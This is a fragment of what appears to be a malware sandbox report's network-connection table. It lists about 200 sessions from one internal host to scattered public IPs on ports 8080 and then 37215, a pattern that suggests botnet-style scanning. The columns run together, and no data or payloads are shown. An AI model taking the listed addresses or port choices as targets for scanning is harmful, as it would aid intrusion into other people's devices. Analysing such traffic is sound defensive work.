                                                        11735192.168.2.2357090113.51.160.1788080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11736192.168.2.2358060161.85.105.1628080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11737192.168.2.2339072135.233.90.838080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11738192.168.2.2348904104.40.61.1738080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11739192.168.2.233722827.56.21.1848080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11740192.168.2.2358496199.86.179.1888080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11741192.168.2.2351350120.6.154.2048080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11742192.168.2.2339866135.180.218.1448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11743192.168.2.2347142122.129.92.1348080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11744192.168.2.2359860171.95.93.108080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11745192.168.2.236082098.142.116.1918080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11746192.168.2.2335966191.51.159.1348080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11747192.168.2.2337194154.13.142.2448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11748192.168.2.2336724151.177.209.78080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11749192.168.2.2355250138.198.78.248080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11750192.168.2.2351854109.201.201.478080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11751192.168.2.23568921.236.97.758080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11752192.168.2.233825837.210.75.498080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11753192.168.2.2355318221.157.61.348080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11754192.168.2.235457662.216.243.338080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11755192.168.2.23571049.211.232.908080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11756192.168.2.233998836.215.19.488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11757192.168.2.2358768193.30.209.1638080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11758192.168.2.235610217.200.125.838080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11759192.168.2.2349884208.2.27.188080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11760192.168.2.2354026165.59.207.2508080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11761192.168.2.2352888112.175.220.1788080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11762192.168.2.2356880143.61.167.688080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11763192.168.2.236043443.71.119.1688080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11764192.168.2.234408871.148.137.1108080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11765192.168.2.2355600193.131.28.1898080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11766192.168.2.2353850119.1.64.948080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11767192.168.2.235589666.174.66.148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11768192.168.2.2349918157.213.214.1348080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11769192.168.2.2341120195.151.230.2368080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11770192.168.2.2333118166.65.142.1938080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11771192.168.2.2340670220.198.246.448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11772192.168.2.2343428222.130.178.1408080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11773192.168.2.235148812.13.196.1178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11774192.168.2.2353920195.80.164.2038080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11775192.168.2.2335828185.90.111.358080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11776192.168.2.2345876216.35.26.1468080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11777192.168.2.2348724183.195.237.98080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11778192.168.2.2335020168.79.115.868080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11779192.168.2.2347958152.170.229.848080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11780192.168.2.234269651.245.169.2018080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11781192.168.2.2354502189.8.235.1728080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11782192.168.2.235520820.87.241.1128080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11783192.168.2.2349478168.124.202.1478080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11784192.168.2.2349030121.131.137.1018080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11785192.168.2.234192212.22.207.1728080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11786192.168.2.236067063.130.157.1668080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11787192.168.2.233475281.15.176.468080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11788192.168.2.2358276122.119.75.1158080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11789192.168.2.2355668108.114.145.228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11790192.168.2.2350276110.137.172.1598080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11791192.168.2.2355214116.240.95.288080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11792192.168.2.2339376171.214.147.1078080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11793192.168.2.2350206152.168.216.928080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11794192.168.2.2340622120.151.144.148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11795192.168.2.233354671.122.62.258080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11796192.168.2.235597076.217.89.2338080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11797192.168.2.2339508188.18.218.2318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11798192.168.2.2344446120.205.126.1898080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11799192.168.2.234519019.60.215.608080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11800192.168.2.2343322132.14.6.1618080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11801192.168.2.2334126106.157.153.2018080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11802192.168.2.23388402.226.52.848080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11803192.168.2.2350378205.31.122.1668080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11804192.168.2.2335958143.221.155.2378080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11805192.168.2.2360030124.251.227.788080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11806192.168.2.2334680203.2.165.358080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11807192.168.2.2356284189.30.175.1098080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11808192.168.2.235977846.233.238.718080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11809192.168.2.2335832222.243.159.2388080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11810192.168.2.2359054211.17.15.1548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11811192.168.2.2343660143.21.96.1748080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11812192.168.2.2356588223.232.84.18080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11813192.168.2.2349818192.71.69.1288080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11814192.168.2.234310665.230.80.1538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11815192.168.2.233455645.131.68.1908080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11816192.168.2.2351596106.231.13.678080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11817192.168.2.2345984185.189.130.1038080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11818192.168.2.2358594175.190.249.2348080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11819192.168.2.235269078.182.82.1128080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11820192.168.2.2350472141.89.115.1178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11821192.168.2.2341796199.124.225.828080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11822192.168.2.2341570216.254.115.578080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11823192.168.2.23397885.106.47.58080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11824192.168.2.2336370219.73.84.2178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11825192.168.2.2342948182.213.190.978080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11826192.168.2.234521620.254.43.2138080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11827192.168.2.234109441.160.129.8237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11828192.168.2.2346836157.173.232.23537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11829192.168.2.2352264157.177.150.18837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11830192.168.2.2342036180.69.136.12837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11831192.168.2.2353910184.58.234.3337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11832192.168.2.235641641.4.207.9337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11833192.168.2.2341418157.209.236.15537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11834192.168.2.2357774157.193.40.937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11835192.168.2.2337622197.235.19.8637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11836192.168.2.2359074197.98.143.12937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11837192.168.2.2342394199.44.122.17637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11838192.168.2.233533088.32.203.13437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11839192.168.2.2348292157.68.53.14837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11840192.168.2.2333344157.40.59.737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11841192.168.2.233474241.106.30.10337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11842192.168.2.2339668197.142.231.18037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11843192.168.2.234260278.92.55.21437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11844192.168.2.234888041.237.241.5837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11845192.168.2.2344324136.143.178.6237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11846192.168.2.2358044145.168.28.4237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11847192.168.2.234969441.86.215.22237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11848192.168.2.234134892.102.105.7037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11849192.168.2.2359248197.217.50.7337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11850192.168.2.2345384197.110.162.6637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11851192.168.2.2339266157.20.245.9837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11852192.168.2.2341918157.12.44.7637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11853192.168.2.2360448197.24.209.10937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11854192.168.2.235035041.186.141.14337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11855192.168.2.2356128197.62.27.14037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11856192.168.2.233366470.76.137.12937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11857192.168.2.235072441.182.17.1937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11858192.168.2.2341724157.101.114.18337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11859192.168.2.2353018144.154.216.24337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11860192.168.2.2356382157.141.86.8537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11861192.168.2.233656241.242.71.6737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11862192.168.2.2352298197.22.134.19537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11863192.168.2.2344648157.241.204.20537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11864192.168.2.235231641.26.57.10737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11865192.168.2.233290441.122.169.3137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11866192.168.2.2355014157.92.102.8837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11867192.168.2.2356726163.73.52.1637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11868192.168.2.2344020157.32.19.237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11869192.168.2.235408241.225.96.10237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11870192.168.2.2347302157.3.197.2837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11871192.168.2.2339976107.0.91.7837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11872192.168.2.2347692157.200.147.6837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11873192.168.2.2359040197.69.168.2237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11874192.168.2.235053441.86.19.12937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11875192.168.2.233977097.15.215.937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11876192.168.2.234087441.173.133.9137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11877192.168.2.235833872.158.90.6237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11878192.168.2.234954241.157.181.037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11879192.168.2.2334742197.55.187.10937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11880192.168.2.2339550157.101.10.20237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11881192.168.2.2354640157.73.99.24537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11882192.168.2.2351024158.201.91.8237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11883192.168.2.235005041.129.18.18837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11884192.168.2.2355572197.114.203.14837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11885192.168.2.2352796217.157.105.9837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11886192.168.2.2335946148.40.139.8937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11887192.168.2.2353390157.8.84.6937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11888192.168.2.2341704197.150.184.7437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11889192.168.2.2342934197.245.143.20237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11890192.168.2.2348834161.254.47.19837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11891192.168.2.233589241.244.107.20837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11892192.168.2.234166441.199.94.23837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11893192.168.2.2343546197.39.75.14637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11894192.168.2.233842041.99.198.9737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11895192.168.2.233956092.141.181.11237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11896192.168.2.2345634197.232.82.19637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11897192.168.2.2332772157.150.30.25437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11898192.168.2.234813041.88.102.19337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11899192.168.2.2349452157.234.209.21237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11900192.168.2.234203250.69.118.16537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11901192.168.2.235780641.32.94.14337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11902192.168.2.2336902157.202.223.21137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11903192.168.2.233866232.23.92.23637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11904192.168.2.234017441.236.163.19937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11905192.168.2.235300241.135.176.2037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11906192.168.2.2355260191.136.187.24337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11907192.168.2.2333934157.106.15.19837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11908192.168.2.235751841.201.7.937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11909192.168.2.2340290157.112.254.2937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11910192.168.2.2354798197.211.146.20437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11911192.168.2.2340508197.131.169.3237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11912192.168.2.235402041.234.63.23837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11913192.168.2.234717841.51.199.12337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11914192.168.2.234870885.20.40.3437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11915192.168.2.233637294.195.200.24837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11916192.168.2.2348894197.76.52.24837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11917192.168.2.2354380197.104.218.1237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11918192.168.2.2360894157.110.43.15237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11919192.168.2.2338270157.110.133.1437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11920192.168.2.235697241.124.242.21337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11921192.168.2.2334186157.42.122.2337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11922192.168.2.2359838171.62.127.2137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11923192.168.2.2355024157.249.144.19237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11924192.168.2.235927641.216.203.5437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11925192.168.2.23568045.187.227.3237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11926192.168.2.2340342197.227.231.21137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11927192.168.2.233931241.23.128.12937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11928192.168.2.2349912197.76.172.20237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11929192.168.2.2346784157.147.176.20837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11930192.168.2.2360578157.155.225.10437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11931192.168.2.2347462157.214.213.20637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11932192.168.2.2360266157.228.190.13337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11933192.168.2.234598041.226.56.4737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11934192.168.2.2350476197.8.255.11237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11935192.168.2.234782241.57.15.22137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11936192.168.2.234553641.189.158.16237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11937192.168.2.2353826110.195.24.19237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11938192.168.2.2334896157.199.168.14537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11939192.168.2.2333018157.110.153.15737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11940192.168.2.2344284197.50.181.8937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11941192.168.2.236089041.225.23.8137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11942192.168.2.234251441.43.249.4137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11943192.168.2.2345966197.67.132.6337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11944192.168.2.2344018197.119.83.13337215
                                                        TimestampBytes transferredDirectionData


